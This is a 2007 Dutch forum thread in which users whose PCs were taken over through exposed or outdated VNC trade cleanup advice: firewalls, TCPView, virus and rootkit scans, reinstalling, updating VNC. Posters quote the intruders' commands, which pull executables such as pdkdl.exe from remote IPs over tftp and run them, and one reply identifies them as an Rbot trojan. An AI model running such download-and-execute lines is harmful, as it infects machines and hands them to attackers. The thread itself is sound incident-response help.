onbekende bezig op pc: %comspec% /c echo - Privacy en beveiliging

woensdag 14 maart 2007 18:09

Acties:

Chocolate addicted

Topicstarter

* ReseTTim heeft net gemerkt dat er dood leuk iemand bezig was op mijn pc. gisteren merkte ik ook al iets maar had niks gezien.. nu zag ik daad werkelijk iemand bezig zijn..

ik heb namelijk VNC geinstalleerd en had geen authentication aangevinkt omdat ik die poort (dacht ik) toch niet open had staan. wel dus

nu vind ik dit in mijn uitvoeren..

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 216.123.181.* GET pdkdl.exe & start pdkdl&

en zo is er ook als Serv-U geinstalleerd maar die heeft blijkbaar niet gedraait ivm poort 21 al in gebruik was.. maarja of dat is aangepast geen idee. heb het er in iedergeval afgehaald en VNC gesloten.

hulp op afstand en gebruik van afstand heb ik net ook nog ffies uitgevinkt kortom niemand komt meer naar binnen.. daarbij ook net ffies msconfig uitgevoerd..

edit:

ook gebruiker gedelete

mijn vraag waar moet ik nog naar kijken..

Mijn profiel - Te koop: Overzicht van spullen..

woensdag 14 maart 2007 18:22

Acties:

GrooV

Een goede firewall gebruiken die alle poorten die je nie nodig hebt dicht gooid, hier kan je zelfs de windows firewall voor gebruiken. Gebruik zelf BlackIce en die doet zijn werk goed hier.

Misschien staat er nog iets raars bij de services. Ook kan je met het programmatje TCPView kijken welke tcp connecties er van/naar je pc open staan en kan je dus zien of er nog een ftp server oid draait.
Verder een virusscan uitvoeren om te kijken of er geen backdoor is achter gelaten.

woensdag 14 maart 2007 18:25

Acties:

Orion84

Admin General Chat / Wonen & Mobiliteit

Fotogenie(k)?

Ik zou inderdaad even scannen op virussen/trojans en dat soort spul. En een rootkit testje kan wellicht ook geen kwaad?

Eigenlijk is alleen een reinstall echt voldoende in zo'n situatie, omdat je geen flauw idee hebt wat ze hebben gedaan in die tijd. Maar of dat de moeite waard is moet je zelf maar beoordelen.

Best creepy, heb dat zelf ook gehad. Dat iemand door een securitybug in VNC de boel kon overnemen. Gelukkig was ik er snel bij en kon ik de UTP lostrekken voordat er iets uitgevoerd kon worden.

The problem with common sense is that it's not all that common. | LinkedIn | Flickr

woensdag 14 maart 2007 22:30

Acties:

elevator

Officieel moto fan :)

Als je PC eenmaal 'compromised' is, moet je uithuilen, formatteren en opnieuw beginnen

Windows Clients >> Beveiliging & Virussen

woensdag 14 maart 2007 22:33

Acties:

ThinkPad

elevator schreef op woensdag 14 maart 2007 @ 22:30:
Als je PC eenmaal 'compromised' is, moet je uithuilen, formatteren en opnieuw beginnen

Windows Clients >> Beveiliging & Virussen

Precies want je weet nooit zeker of het virus / de trojan horse weg is.

zaterdag 17 maart 2007 10:20

Acties:

Haijo

Even nieuwsgierig maar hoe zag je het precies? Begonnen er in een keer vensters open te gaan e.d.?

zaterdag 17 maart 2007 12:10

Acties:

ReseTTim

Chocolate addicted

Topicstarter

Haijo schreef op zaterdag 17 maart 2007 @ 10:20:
Even nieuwsgierig maar hoe zag je het precies? Begonnen er in een keer vensters open te gaan e.d.?

ik hoorde opeens een *ploink* er stonden 2 dos boxen open en wou iets starten wat niet lukte.. vandaar die *ploink*

Mijn profiel - Te koop: Overzicht van spullen..

dinsdag 10 april 2007 19:20

Acties:

Rockafello

Hier dus hetzelfde probleem bij mijn ouders, heb met HiJackThis al gekeken en hitmanpro erover gehaald. nu bezig met full system scan. maar heb nog niks gevonden.

commando's die allemaal bij uitvoeren stonden:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 75.8.46.128 GET davi.exe & start davi&
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 68.248.227.252 GET msxc.exe & start msxc&
Die doen we toch maar helemaal weg

/afk.exe
%systemroot%\system32\cmd.exe

heb het systeem al gecheckt op die bovenste twee bestanden, maar niks gevonden. Iemand al een idee waar dit vandaan komt. Heb overigens wel VNC geinstalleerd en WEL met password beveiligd. deze heb ik inmiddels al veranderd.

[ Voor 5% gewijzigd door pasta op 11-04-2007 13:53 ]

dinsdag 10 april 2007 19:24

Acties:

markvt

Peppi Cola

oude vnc versie waarschijnlijk rockafello, update je vnc versie eens is een bekende exploit voor oudere versies.

van-tilburg.info -=- meka (sega emulator) - Proud MEDION fanclub member - KOPPIG VOLHOUDEN !

dinsdag 10 april 2007 19:26

Acties:

Bart1983

Het lijkt me wel verstandig als je die link even weg haalt want het betreft hier wel een Rbot trojan

dinsdag 10 april 2007 19:29

Acties:

Puch-Maxi

Rockafello schreef op dinsdag 10 april 2007 @ 19:20:
Hier dus hetzelfde probleem bij mijn ouders, heb met HiJackThis al gekeken en hitmanpro erover gehaald. nu bezig met full system scan. maar heb nog niks gevonden.

Gelieve de link even te verwijderen...

Modbreak:Quote het dan ook niet

-edit goed idee Bart1983

[ Voor 33% gewijzigd door pasta op 11-04-2007 13:53 ]

My favorite programming language is solder.

dinsdag 10 april 2007 19:44

Acties:

Puch-Maxi

Modbreak:En dit is door de gehele gemodbreakte discussie ook overbodig geworden.

[ Voor 76% gewijzigd door pasta op 11-04-2007 13:54 ]

My favorite programming language is solder.

dinsdag 10 april 2007 19:51

Acties:

0siris

Ik heb over VNC ook eens een topic geopend met ruwweg dezelfde verschijnselen, misschien heb je er wat aan

ach...in een volgend leven lach je er om!

zondag 15 april 2007 12:08

Acties:

Rockafello

inmiddels de software geupdate en het probleem is verholpen lijkt het.

maandag 16 april 2007 23:06

Acties:

alt-92

ye olde farte

Rockafello schreef op zondag 15 april 2007 @ 12:08:
inmiddels de software geupdate en het probleem is verholpen lijkt het.

Lijkt het being the keyword here...

Ik zou er toch een lekkere frisse reinstall overheen gooien.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

maandag 23 april 2007 22:16

Acties:

Verwijderd

Kennelijk wordt het niet gewaardeerd als je Whois informatie m.b.t. de scam-site hier neerzet.
Het is uiteindelijk toch cyber-tuig ?.
Openbaar maken zou wel moeten, want ze zijn tot last. Iedereen kan tenslotte de gegevens opvragen, en dus kan dat hier ook neergezet worden, mijn inziens. Als het prive informatie betreft, is het niet oproepbaar toch?

Maar het wordt weggemod

, zodat niemand kan zien, wie er nu achter zit.

Best jammer....in andere woorden : als ze de servers van tweakers.net kunnen misbruiken op het versturen van 600.000 emails, zullen ze het niet nalaten.

Zeker die noobs punt org is er een goed voorbeeld van. Die moeten gewoon opgerold worden, klaar.
Maar nu weet je niet eens waar het overgaat....

Overigens is die site al ruim een jaar of 3 in de lucht, en mede door deze site/vermeldingen, weten we wel nu wie er achter zitten. (gokje : hoeveel pc's zouden er ' besmet zijn? ')

Bedoeling was geweest, dat een grote-beheerder dit had kunnen lezen, en er stappen tegen had kunnen ondernemen.....nu is er vermoedelijk niets gebeurd....jammer.